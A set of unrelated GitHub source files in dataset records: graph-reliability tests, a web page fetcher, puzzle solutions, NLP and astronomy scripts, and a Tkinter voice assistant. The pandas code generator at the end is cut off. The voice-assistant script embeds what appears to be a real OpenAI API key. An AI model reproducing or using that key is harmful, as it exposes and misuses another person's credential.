edge_color = 'b', style = 'dashed')\n from itertools import izip\n l = [(a, b) for a, b in izip(path[0:-1], path[1:])]\n T = nx.Graph()\n T.add_edges_from(l)\n nx.draw_networkx_edges(T, pos, width = 6)\n # labels\n nx.draw_networkx_labels(G, pos, font_size = 20, font_family = 'sans-serif')\n def test_sanity1(self):\n G = nx.Graph()\n G.add_edge('a', 'b', fp = 0.6)\n G.add_edge('a', 'c', fp = 0.2)\n G.add_edge('c', 'd', fp = 0.1)\n G.add_edge('c', 'e', fp = 0.7)\n G.add_edge('c', 'f', fp = 0.9)\n G.add_edge('a', 'd', fp = 0.3)\n path = reliable(G, 'b', 'f')\n self.assertEqual(path, ['b', 'a', 'c', 'f'], 'test 1 failed')\n #self.draw_mst(G, path, 1)\n\n def test_sanity2(self):\n G = nx.Graph()\n G.add_edge('a', 'b', fp = 0.6)\n G.add_edge('a', 'c', fp = 0.9)\n G.add_edge('c', 'd', fp = 0.1)\n G.add_edge('c', 'e', fp = 0.7)\n G.add_edge('c', 'f', fp = 0.9)\n G.add_edge('a', 'd', fp = 0.3)\n path = reliable(G, 'b', 'f')\n self.assertEqual(path, ['b', 'a', 'd', 'c', 'f'], 'test 2 failed')\n #self.draw_mst(G, path, 2)\n @classmethod\n def tearDownClass(cls):\n if HAVE_PLT:\n plt.show() # display\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"lucatonile/AD","sub_path":"AD3/reliable_communications.py","file_name":"reliable_communications.py","file_ext":"py","file_size_in_byte":5762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21179621242","text":"import requests\nfrom typing import Optional\nfrom config import BASE_URL, parser_logger\n\n\ndef get_page(page_path: str) -> Optional[str]:\n \"\"\"\n Запрос страницы с сайта bestchange.ru\n\n :param page_path: путь до страницы\n :type page_path: str\n :return: html-код страницы или ничего в случае ошибки\n :rtype: Optional[str]\n \"\"\"\n\n full_url = BASE_URL + page_path\n response = requests.get(full_url, timeout=5)\n if response.status_code == 200:\n return response.text\n else:\n parser_logger.error(f'Не удалось установить соединение со страницей. Статус ответа: {response.status_code}')\n raise requests.exceptions.ConnectionError\n","repo_name":"AlexSolokhin/bart_test_task","sub_path":"parser/get_bestchange.py","file_name":"get_bestchange.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33102559356","text":"import unittest\n\n# Paul Armstrong\n\ndef part_one(target_num):\n\t# Traverse the spiral to find the coordinates of the number. 
Spiral format:\n\t#\n\t#\t\t5 4 3\n\t#\t\t6 1 2\n\t#\t\t7 8 9\n\t#\n\tdirections = [[1,0], [0,1], [-1,0], [0,-1]]\n\tdir_change_count = 0\n\tposition = [0,0]\n\tpos_num = 1\n\twhile pos_num < target_num:\n\t\t# Perform ([number of direction changes] // 2 + 1) movements per direction\n\t\tfor t in range(0, (dir_change_count // 2) + 1):\n\t\t\tif (pos_num >= target_num):\n\t\t\t\tbreak\n\t\t\t# Move in the direction and add one to the position number\n\t\t\tposition[0] += directions[dir_change_count % 4][0]\n\t\t\tposition[1] += directions[dir_change_count % 4][1]\n\t\t\tpos_num += 1\n\n\t\t# Turn to the next direction\n\t\tdir_change_count += 1\n\t\t\n\t# Get the manhattan distance from the position\n\treturn abs(position[0]) + abs(position[1])\n\t\n\ndef part_two(target_num):\n\t# Use a map (dictionary) to build and traverse the spiral to find the next highest number.\n\t# In this sprial the position's number is the surrounding 8 numbers combined:\n\t#\n\t#\t\t5 4 2\n\t#\t\t10 1 1\n\t#\t\t11 23 25\n\t#\n\tspiral_dict = dict()\n\tspiral_dict[tuple([0,0])] = 1\n\tdirections = [[1,0], [0,1], [-1,0], [0,-1]]\n\tdir_change_count = 0\n\tposition = [0,0]\n\tpos_num = 1\n\twhile pos_num <= target_num:\n\t\t# Perform ([number of direction changes] // 2 + 1) movements per direction\n\t\tfor t in range(0, (dir_change_count // 2) + 1):\n\t\t\tif (pos_num > target_num):\n\t\t\t\tbreak\n\t\t\t# Move in the direction\n\t\t\tposition[0] += directions[dir_change_count % 4][0]\n\t\t\tposition[1] += directions[dir_change_count % 4][1]\n\n\t\t\t# Use the dictionary to determine the new position's number\n\t\t\tpos_num = 0\n\t\t\tfor i in range(-1, 2):\n\t\t\t\tfor j in range(-1, 2):\n\t\t\t\t\ttemp_pos = position.copy()\n\t\t\t\t\ttemp_pos[0] += i\n\t\t\t\t\ttemp_pos[1] += j\n\t\t\t\t\tpos_num += spiral_dict.get(tuple(temp_pos), 0)\n\n\t\t\t# Map the new position to the new position number in the dictionary\n\t\t\tspiral_dict[tuple(position)] = pos_num\n\n\t\t# Turn to the next direction\n\t\tdir_change_count += 1\n\n\t# Return this pos_num (it is the largest after the target_num)\n\treturn pos_num\n\n\ndef main():\n\t# Get the number\n\ttarget_num = int(open(\"input.txt\").readline())\n\n\t# Print the results\n\tprint(\"Part one: \", part_one(target_num))\n\tprint(\"Part two: \", part_two(target_num))\n\n\nclass Day3Tests(unittest.TestCase):\n\tdef test_part_one(self):\n\t\tinputs = [\t1, 3, 6, 10]\n\t\toutputs = [\t0, 2, 1, 3]\n\t\tfor i in range(0, len(inputs)):\n\t\t\tself.assertEqual(outputs[i], part_one(inputs[i]))\n\n\tdef test_part_two(self):\n\t\tinputs = [\t1, 2, 23, 147]\n\t\toutputs = [\t2, 4, 25, 304]\n\t\tfor i in range(0, len(inputs)):\n\t\t\tself.assertEqual(outputs[i], part_two(inputs[i]))\n\n\nif (__name__ == \"__main__\"):\n\tmain()\n\tunittest.main()\n\n","repo_name":"paulbarmstrong/advent-of-code-2017-solutions","sub_path":"Day3/Day3.py","file_name":"Day3.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33943789600","text":"# Read pdf.\n\nfrom pathlib import Path\n\nfrom PyPDF2 import PdfReader\n\n\ndef read():\n pdf = Path('source/1110210.pdf')\n reader = PdfReader(pdf)\n for page in reader.pages:\n text = page.extract_text()\n print(text)\n\n\nif __name__ == '__main__':\n 
read()\n","repo_name":"FWcloud916/tw-boating-exam-convert","sub_path":"read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27506130027","text":"import internal_config\nfrom gensim.models import word2vec\nfrom database import mongodb_client\nfrom pymongo import DeleteOne\nimport requests\n\n\nPOLARITY_UNK = internal_config.polarity_unk\nPU_KEEP = internal_config.keep_p\nPU_pattern = internal_config.PU_pattern\nPU = internal_config.PU\nWORD2VEC_URL = internal_config.WORD2VEC_URL\n\n\nclass Resources_data:\n def __init__(self, *args):\n pass\n\n\ndef load_resources(domain):\n \"\"\"\"\"\"\n resources_data = Resources_data()\n \"\"\"加载分词,词性,依存\"\"\"\n documents = mongodb_client.db['comments'].find({'domain': domain})\n seg_list = []\n pos_list = []\n \"\"\"这里doc['seg']是string,下面还要按空格分隔\"\"\"\n for idx, doc in enumerate(documents):\n seg_list.append(doc['seg'].split(' '))\n pos_list.append(doc['pos'].split(' '))\n\n \"\"\"加载按标点符号分隔的分词,词性\"\"\"\n seg_pu_list, pos_pu_list = _split_by_pu(seg_list, pos_list)\n\n \"\"\"加载第三方情感词典\"\"\"\n general_opinion_doc = mongodb_client.db['opinion_resources'].find_one({'doc_type': 'general_opinion'})\n general_opinion = general_opinion_doc['lexicon']\n\n \"\"\"加载停用词表\"\"\"\n stopwords = []\n stopwords_docs = mongodb_client.db['opinion_resources'].find({'doc_type': 'stopwords'})\n for doc in stopwords_docs:\n for word in doc['lexicon']:\n stopwords.append(word)\n\n \"\"\"加载用户定义词典\"\"\"\n user_defined_aspect = []\n udf_doc = mongodb_client.db['opinion_resources'].find_one({'doc_type': 'product_tag', 'domain': domain})\n for word in udf_doc['lexicon']:\n user_defined_aspect.append(word)\n \"\"\"加载word2vec模型\"\"\"\n word2vec_model = load_word2vec_model()\n\n resources_data.seg_list = seg_list\n resources_data.seg_pu_list = seg_pu_list\n resources_data.pos_list = pos_list\n resources_data.pos_pu_list = pos_pu_list\n resources_data.general_opinion = general_opinion\n resources_data.stopwords = stopwords\n resources_data.user_defined_aspect = user_defined_aspect\n resources_data.word2vec_model = word2vec_model\n\n return resources_data\n\n\ndef _split_by_pu(seg_list, pos_list):\n \"\"\"将每条评论的分词和词性标注结果按照标点符号分割,每行是一个短句,重新写入一个文件\"\"\"\n seg_pu_list = []\n pos_pu_list = []\n for x, word_line in enumerate(seg_list):\n start_idx = 0\n no_error = True\n for y, word in enumerate(word_line):\n if word in PU_KEEP and pos_list[x][y] in PU:\n end_idx = y\n seg_pu_list.append(word_line[start_idx: end_idx])\n pos_pu_list.append(pos_list[x][start_idx: end_idx])\n start_idx = y + 1\n elif word in PU_KEEP and pos_list[x][y] not in PU:\n no_error = False\n else:\n continue\n else:\n if start_idx != len(word_line) and no_error:\n seg_pu_list.append(word_line[start_idx:])\n pos_pu_list.append(pos_list[x][start_idx:])\n return seg_pu_list, pos_pu_list\n\n\ndef load_word2vec_model():\n r = requests.get(WORD2VEC_URL)\n with open('word2vec.model', 'wb') as f:\n f.write(r.content)\n model = word2vec.Word2Vec.load(\"word2vec.model\")\n return model\n\n","repo_name":"zhuwenbo1988/nlp","sub_path":"opinion_mining/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"28328869300","text":"import csv\r\nimport math\r\nimport sys\r\nimport gc\r\nimport numpy as np\r\nfrom itertools import combinations\r\npaircsv=[]\r\npairlist=[]\r\nwith 
open('pair.csv')as f:\r\n f_csv = csv.reader(f)\r\n for row in f_csv:\r\n paircsv.append(row)\r\n\r\ncombin=np.linspace(2, len(paircsv)-1, len(paircsv)-1-1, endpoint=True, retstep=False, dtype=None)\r\nfor i in range(2,len(paircsv)):\r\n for j in range(i+1,len(paircsv)):\r\n ra1=float(paircsv[i][1])\r\n ra2=float(paircsv[j][1])\r\n dec1=float(paircsv[i][2])\r\n dec2=float(paircsv[j][2])\r\n redshift1=float(paircsv[i][4])\r\n redshift2=float(paircsv[j][4])\r\n d1=299792.458*redshift1*1000000/67.8\r\n d2=299792.458*redshift2*1000000/67.8\r\n maxd=max(d1,d2)\r\n cosA=math.cos(dec1*math.pi/180)*math.cos(dec2*math.pi/180)+math.sin(dec1*math.pi/180)*math.sin(dec2*math.pi/180)*math.cos((ra1-ra2)*math.pi/180)\r\n if cosA >1 :\r\n touying=0\r\n elif cosA <-1:\r\n touying=maxd*math.pi\r\n else:\r\n touying=maxd*math.acos(cosA)\r\n deltaz=abs(((1+redshift1)**2-1)/(1+(1+redshift1)**2)-((1+redshift2)**2-1)/(1+(1+redshift2)**2))*299792.458\r\n if touying < 200000 and deltaz < 500 and paircsv[i][0] != paircsv[j][0]:\r\n pairlist.append([min(paircsv[i][0],paircsv[j][0]),max(paircsv[i][0],paircsv[j][0])])\r\n gc.collect()\r\n if i % 50 ==0:\r\n print(i/len(combin))\r\n \r\n\r\nheaders = ['objid1','objid2']\r\nwith open('newpair.csv','w',newline='')as f:\r\n f_csv = csv.writer(f)\r\n f_csv.writerow(headers)\r\n f_csv.writerows(pairlist)\r\n f.close()\r\n\r\n\r\n\r\n","repo_name":"chen-yr18/SFRandAM","sub_path":"newpair.py","file_name":"newpair.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4519899799","text":"import sys\n\n\ndef calculate_mass_of_berries(first_with_berries, second_with_berries,\n first_without_berries, second_without_berries):\n \"\"\"\n\n :param first_with_berries: Weight of the first mathematician's basket with berries\n :param second_with_berries: Weight of the second mathematician's basket with berries\n :param first_without_berries: Weight of the first mathematician's basket without berries\n :param second_without_berries: Weight of the second mathematician's basket without berries\n :type first_with_berries: int\n :type second_with_berries: int\n :type first_without_berries: int\n :type second_without_berries: int\n :return: Mass of berries picked by first mathematician and the second separated with space\n :rtype str\n \"\"\"\n first_berry_mass = first_with_berries - first_without_berries\n second_berry_mass = second_with_berries - second_without_berries\n return str(first_berry_mass) + \" \" + str(second_berry_mass)\n\n\n# Read all lines\nfirst_line = sys.stdin.readline()\nsecond_line = sys.stdin.readline()\nthird_line = sys.stdin.readline()\n\n# Split all lines\nsplit_first_line = first_line.split()\nsplit_second_line = second_line.split()\nsplit_third_line = third_line.split()\n\n# Get numbers\nnum1 = int(split_first_line[0])\nnum2 = int(split_first_line[1])\nnum3 = int(split_third_line[0])\nnum4 = int(split_second_line[1])\n\n# Print the solution\nprint(calculate_mass_of_berries(num1, num2, num3, num4))\n","repo_name":"hovteamable/timus-py3","sub_path":"Mathematicians and Berries(2001).py","file_name":"Mathematicians and Berries(2001).py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33131170109","text":"class Solution(object):\n def numJewelsInStones(self, J, S):\n \"\"\"\n :type J: str\n :type S: str\n :rtype: int\n \"\"\"\n sum = 0\n for c in S:\n if c in J:\n 
sum+=1\n return sum\n\ns = Solution()\nprint(s.numJewelsInStones(\"aA\",\"aAAbbbb\"))\n\nprint([i in \"aA\" for i in \"aAAbbb\"])\n\nprint([i in \"a\" for i in \"aAAbbb\"])\n\nJ = \"aA\"\nS = \"AAaajjj\"\n\ns = map(J.count,S)\nprint(s)\nprint(list(s))\n\n# str.count() requires an argument; count a single character instead of calling it bare\nprint(J.count(\"a\"))\n\n","repo_name":"shen-ee/LC","sub_path":"code/771.py","file_name":"771.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29342087391","text":"# -*- coding: utf-8 -*-\nimport xml.etree.cElementTree as ET\nparser = ET.XMLParser(encoding=\"utf-8\")\ntree = ET.parse('fh.xml', parser=parser)\nroot = tree.getroot()\nspisok = {}\nname = ''\nfor elem in root:\n for subelem in elem:\n for subsubelem in subelem:\n if subsubelem.text!= None:\n if len(subsubelem.text)> 12 and subsubelem.text[:4]!=\"3743\":# and subsubelem.text[:-1]!=\".\":\n name = subsubelem.text\n elif len(subsubelem.text)==3 and subsubelem.text!='SIP' and subsubelem.text[-1]!='.':\n spisok[name] = subsubelem.text\n\nprint(spisok)\n\ncontacts = ET.Element('contacts')\ni=0\nfor key,val in spisok.items():\n i+=1\n contact = ET.SubElement(contacts, 'contact')\n contact.set(\"number\",str(i))\n contact.set(\"name\", key)\n contact.set(\"firstname\", '')\n contact.set(\"lastname\", '')\n contact.set(\"phone\", val)\n contact.set(\"mobile\", '')\n contact.set(\"email\", '')\n contact.set(\"address\", '')\n contact.set(\"city\", '')\n contact.set(\"state\", '')\n contact.set(\"zip\", '')\n contact.set(\"comment\", '')\n contact.set(\"presence\", '')\n contact.set(\"info\", '')\nappt = open('appt.xml','w',encoding=\"utf-8\")\nstrET = ET.tostring(contacts,encoding=\"utf-8\")\nstrET= strET.decode(encoding=\"utf-8\", errors=\"strict\")\nappt.write(strET)\n","repo_name":"Rammbest/TKServis","sub_path":"XML_contact.py","file_name":"XML_contact.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28959970025","text":"def reverse(list):\r\n c=[]\r\n for l in reversed(list) :\r\n c.append(l)\r\n\r\n return c\r\n# m = [1,2,3,4,5]\r\n# print(reverse(m))\r\nlst =[]\r\nu = int(input('enter no. 
of elements'))\r\n\r\nprint('enter list items')\r\nfor n in range(0,u):\r\n ele = int(input())\r\n lst.append(ele)\r\nprint(reverse(lst))","repo_name":"vansh45/vvizard","sub_path":"codes/DSA 2023/4_reverse.py","file_name":"4_reverse.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23712412267","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter import filedialog\nfrom tkinter.ttk import Combobox\nimport pyttsx3\nimport os\nfrom tkinter import *\nfrom PIL import ImageTk, Image\nimport pywhatkit as pwt\nimport openai\nimport pyttsx3\nimport speech_recognition as sr\nimport datetime\nimport wikipedia\nimport webbrowser\nimport os\nimport time\nimport googletrans\nimport speech_recognition\nimport gtts\nimport playsound\n\n\nroot = Tk()\nroot.title(\"Debuggers\")\nroot.geometry(\"900x450+200+200\")\nroot.resizable(False,False)\nroot.configure(bg=\"#3e8187\")\n\ndef yt():\n recognizer = speech_recognition.Recognizer()\n with speech_recognition.Microphone() as source:\n print(\"speak now\")\n voice = recognizer.listen(source,0,8)\n text = recognizer.recognize_google(voice,language=\"hi\")\n print(text)\n # print(googletrans.LANGUAGES)\n translator = googletrans.Translator()\n translation = translator.translate(text,dest=\"en\")\n # print(translation.text)\n a = translation.text\n print(a)\n pwt.playonyt(a)\n\n \n\ndef cg():\n recognizer = speech_recognition.Recognizer()\n with speech_recognition.Microphone() as source:\n print(\"speak now\")\n voice = recognizer.listen(source,0,8)\n text = recognizer.recognize_google(voice,language=\"hi\")\n print(text)\n # print(googletrans.LANGUAGES)\n translator = googletrans.Translator()\n translation = translator.translate(text,dest=\"en\")\n # print(translation.text)\n a = translation.text\n print(a)\n converted_audio = gtts.gTTS(translation.text, lang=\"en\")\n # converted_audio.save(\"chatgpt.mp3\")\n # playsound.playsound(\"hello.mp3\")\n # music_dir = 'D:\\\\Jarvis Voice Assistant'\n # songs = os.listdir(music_dir)\n # print(songs)\n # os.startfile(os.path.join(music_dir, songs[7]))\n\n engine = pyttsx3.init('sapi5')\n voices = engine.getProperty('voices')\n # print(voices[1].id)\n engine.setProperty('voice', voices[0].id)\n\n def speak(audio):\n engine.say(audio)\n engine.runAndWait()\n\n\n openai.api_key=\"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\"\n\n model_engine = \"text-davinci-003\"\n prompt = a\n\n completion = openai.Completion.create(\n engine = model_engine,\n prompt = prompt,\n max_tokens = 1024,\n n =1,\n stop = None,\n temperature = 0.5,\n )\n\n response = completion.choices[0].text\n print(response)\n # speak(response)\n\n # print(googletrans.LANGUAGES)\n translator = googletrans.Translator()\n translation = translator.translate(response,dest=\"hi\")\n print(translation.text)\n converted_audio = gtts.gTTS(translation.text, lang=\"hi\")\n converted_audio.save(\"chatgpt.mp3\")\n # playsound.playsound(\"hello.mp3\")\n music_dir = 'C:\\\\Users\\\\jaiam\\\\OneDrive\\\\Desktop\\\\New folder (4)\\\\Speech_Recoginition'\n songs = os.listdir(music_dir)\n # print(songs)\n os.startfile(os.path.join(music_dir, songs[4]))\n\ndef sleep():\n # speak(\"I am going for a sleep\")\n time.sleep(60)\n\n\n\n\n#icon\nimage_icon=PhotoImage(file=\"speaker logo.png\")\nroot.iconphoto(False,image_icon)\n\n# Top Frame\nTop_frame = Frame(root,bg=\"#154c79\", width=900, 
height=100)\nTop_frame.place(x=0,y=0)\n\n\nLabel(Top_frame,text=\"Time pass\", font=\"arial 36 bold\", bg=\"#154c79\", fg=\"white\").place(x=350,y=20)\n\n\n################\nTop_frame = Frame(root,bg=\"#2e2e2d\", width=250, height=500)\nTop_frame.place(x=0,y=100)\n\nbtn=Button(root,text=\"YT\", width=10, font=\"arial 14 bold\", bg=\"#39c790\",command=yt)\nbtn.place(x=400,y=160)\nbtn2=Button(root,text=\"CG\", width=10, font=\"arial 14 bold\", bg=\"#39c790\",command=cg)\nbtn2.place(x=650,y=160)\nbtn3=Button(root,text=\"Sleep\", width=10, font=\"arial 14 bold\", bg=\"#39c790\",command=sleep)\nbtn3.place(x=400,y=280)\nbtn4=Button(root,text=\"Exit\", width=10, font=\"arial 14 bold\", bg=\"#39c790\",command=root.destroy)\nbtn4.pack()\nbtn4.place(x=650,y=280)\n\n\nroot.mainloop()\n","repo_name":"yogendra-saini/Speech-Recognition","sub_path":"youtube1.py","file_name":"youtube1.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70223136693","text":"import argparse\nimport logging\nimport re\nimport string\n\nimport gensim\nimport numpy as np\nimport json\n\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\n\nPUNCT_RE = re.compile(r'[^\\w\\s]+$')\ndef is_punct(string):\n return PUNCT_RE.match(string) is not None\n\nft_home = '/home/folgert/local/fastText-0.1.0/fasttext'\n\ndef load_data(fpath):\n logging.info(\"Loading dataset... {}\".format(fpath))\n lines = [] \n for line in open(fpath):\n song = json.loads(line.strip())\n for verse in song['text']:\n for line in verse:\n words = []\n n_words = len(line)\n for i, word in enumerate(line):\n token = word.get('token', word.get('word'))\n if not is_punct(token):\n syllables = []\n for j, syllable in enumerate(word['syllables']):\n if len(word['syllables']) > 1:\n if j == 0:\n syllable = syllable + '-'\n elif j == (len(word['syllables']) - 1):\n syllable = '-' + syllable\n else:\n syllable = '-' + syllable + '-'\n words.append(syllable.lower())\n lines.append(words)\n logging.info(\"Loading done!\")\n return lines\n\n\ndef train_model(data, output, min_count, dim, window, workers, model):\n sg = 1 if model == 'skipgram' else 0\n if model == 'fasttext':\n model = gensim.models.FastText(size=dim, window=window, workers=workers, min_count=min_count)\n model.build_vocab(data)\n model.train(data, total_examples=model.corpus_count, epochs=10)\n else:\n model = gensim.models.Word2Vec(\n data, min_count=min_count, size=dim, window=window, workers=workers, sg=sg)\n model.wv.save(output)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--training_files\", nargs='+')\n parser.add_argument(\"--output_file\")\n parser.add_argument(\"--dim\", default=300, type=int)\n parser.add_argument(\"--window\", default=5, type=int)\n parser.add_argument(\"--model\", default=\"cbow\", choices=('skipgram', 'cbow', 'fasttext'))\n parser.add_argument(\"--workers\", default=4)\n parser.add_argument(\"--min_count\", default=5, type=int)\n args = parser.parse_args()\n\n lines = []\n for file in args.training_files:\n lines.extend(load_data(file))\n train_model(lines, args.output_file, args.min_count, args.dim,\n args.window, args.workers, 
args.model)\n\n","repo_name":"fbkarsdorp/deepflow","sub_path":"preprocess/train_syllable_embeddings.py","file_name":"train_syllable_embeddings.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31738046092","text":"\nimport os\nimport subprocess\nfrom nicerlab.ftools.ftutils import *\n \ndef ftselect( inputfile, outputfile, expression, ext=1, copyall=True, clobber=False):\n \"\"\"\n Calls ftselect in a subprocess. Returns the outputfile name on success and\n raises an error on failure.\n\n Parameters\n ----------\n inputfile: string\n Filename of the input fits table\n\n outputfile: string\n Filename of the output fits table\n\n expression: string\n Ftools style rowfilter expression. See\n https://heasarc.gsfc.nasa.gov/lheasoft/ftools/headas/rowfilter.html\n for detailed instructions.\n\n clobber: bool\n Overwrite flag. Default is False, meaning existing output will **not**\n be overwritten.\n\n ext: object\n Fits extension to filter. Takes the HDU name or index. Default is 1.\n\n \"\"\"\n\n if (os.path.exists(outputfile) and clobber==False):\n return outputfile\n \n # Copy the use environment\n my_env = os.environ.copy()\n my_env[\"HEADASPROMPT\"] = \"/dev/null\"\n \n # Construct the command\n cmd = \"ftselect '{0}[{1}]' {2} '{3}' copyall={4} clobber={5}\".format(\n inputfile, ext, outputfile, expression, \n clobber_str(copyall), clobber_str(clobber) \n )\n\n # Execute and get output\n p = subprocess.Popen(cmd, shell=True, env=my_env, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n if (p.wait() == 0):\n return outputfile\n else:\n # Read from the stdout \n message = p.stderr.read()\n raise FtoolsError(p.wait(), cmd, message)\n\n","repo_name":"peterbult/nicerlab","sub_path":"nicerlab/ftools/ftselect.py","file_name":"ftselect.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"3708628071","text":"from typing import Optional, List\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def swapPairs(self, head: Optional[ListNode]) -> Optional[ListNode]:\n dummy = ListNode(None, head)\n prev = dummy\n while head and head.next:\n next = head.next\n prev.next = next\n next.next, head.next = head, next.next\n prev = head\n head = head.next\n return dummy.next\n\n\ndef array_to_list(list: List) -> ListNode:\n item = None\n for v in list[::-1]:\n item = ListNode(v, item)\n return item\n\n\ndef print_list(head: ListNode):\n while head is not None:\n print(head.val, end=\" \")\n head = head.next\n print()\n\n\ntest = Solution()\nprint_list(test.swapPairs(array_to_list([1, 2, 3, 4])))\nprint_list(test.swapPairs(array_to_list([1])))\nprint_list(test.swapPairs(array_to_list([])))\nprint_list(test.swapPairs(array_to_list([1, 2, 3, 4, 5])))\n","repo_name":"dmp2016/LeetCode","sub_path":"Swap Nodes in Pairs.py","file_name":"Swap Nodes in Pairs.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11681451912","text":"import uuid\nfrom enum import Enum\n\nfrom pydantic import BaseModel, Field, validator\n\n\nclass Issuer(Enum):\n visa = 'visa'\n mastercard = 'mastercard'\n\n\nclass MockedCard(BaseModel):\n id: str = Field(default_factory=uuid.uuid4, alias=\"_id\")\n pan: str = Field(...)\n 
expiration_date: str = Field(regex=r\"(1[0-2]|0[1-9]|\\d)/(2[3-9]|[3-9]\\d)\")\n cardholder_name: str = Field(...)\n issuer: Issuer = Field(default=\"visa\")\n\n def __eq__(self, other):\n if isinstance(other, MockedCard):\n print(f\"equals {self.issuer} == {other.issuer}\")\n return self.id == other.id or (\n self.pan == other.pan and\n self.expiration_date == other.expiration_date and\n self.cardholder_name == other.cardholder_name and\n self.issuer == other.issuer\n )\n return False\n\n class Config:\n allow_population_by_field_name = True\n schema_extra = {\n \"example\": {\n \"pan\": \"4242424242424242\",\n \"expiration_date\": \"12/24\",\n \"cardholder_name\": \"Lionel Messi\",\n \"issuer\": \"visa\",\n }\n }\n\n\nclass MockedCardRequestBody(BaseModel):\n expiration_date: str = Field(regex=r\"(1[0-2]|0[1-9]|\\d)/(2[3-9]|[3-9]\\d)\")\n cardholder_name: str = Field(...)\n issuer: str = Field(default=\"visa\")\n\n class Config:\n schema_extra = {\n \"example\": {\n \"expiration_date\": \"12/24\",\n \"cardholder_name\": \"Lionel Messi\",\n \"issuer\": \"visa\",\n }\n }\n","repo_name":"ecofood-tdp1/back","sub_path":"app/models/mocks.py","file_name":"mocks.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30587939200","text":"#!/usr/bin/env python3\n\nclass Panda_code:\n def __init__(self, functor, functor_id) -> None:\n self.functor = functor\n self.functor_id = functor_id\n @staticmethod\n def import_libs():\n return f\"\"\"\nfrom pandaUtil_mysql_chain import mysql_chain\nfrom pandaUtil_append import chunk_append,readMysql\n \"\"\".strip()\n\n @property\n def code(self):\n method = self.functor.__class__.__name__\n return getattr(self, method)()\n\n def readMysql(self):\n base_data = self.functor.base_data\n # param = self.functor.code_param\n # 'table_info': {'table_schema': 'db_aliyun', 'table_name': 'sy_cd_ms_sh_gs_shlist_new', 'table_comment': '工商股东表', 'table_catalog': 'def', 'table_rows': 0, 'avg_row_length': 0}\n print('base_data', base_data)\n db_name = base_data['table_info']['table_schema']\n tb_name = base_data['table_info']['table_name']\n tb_cn_name = base_data['table_info']['table_comment']\n \n base_field_list = base_data['field_list'][1:]\n base_comment_list = base_data['comment_list'][1:]\n select_list = base_data['select_list'][1:]\n select_field_list = \",\".join([\n field\n for i,field in enumerate(base_field_list)\n if select_list[i]==True\n ])\n select_comment_list = ','.join([\n commend\n for i,commend in enumerate(base_comment_list)\n if select_list[i]==True\n \n ])\n cond_list = ','.join([\n cond\n for cond in base_data['cond_list']\n if cond.strip() != ''\n ])\n # print('readMysql:parse', param)\n r = f\"\"\"\ndef f_root():\n \"{self.functor.__class__.__name__}\"\n # {tb_cn_name}\n # {select_comment_list}\n for chunk in readMysql(mysql_chain.{db_name})[\n \"{tb_name}\",\n \"{select_field_list}\",\n \"{cond_list}\",\n ].df_chunks:\n yield chunk\n \"\"\".strip()\n return r\n \n def colAppend(self):\n base_data = self.functor.base_data\n print('base_data', base_data)\n db_name = base_data['table_info']['table_schema']\n tb_name = base_data['table_info']['table_name']\n tb_cn_name = base_data['table_info']['table_comment']\n \n base_field_list = base_data['field_list'][1:]\n base_comment_list = base_data['comment_list'][1:]\n select_list = base_data['select_list'][1:]\n key_list = base_data['key_list'][1:]\n select_field_list = \",\".join([\n field\n for i,field 
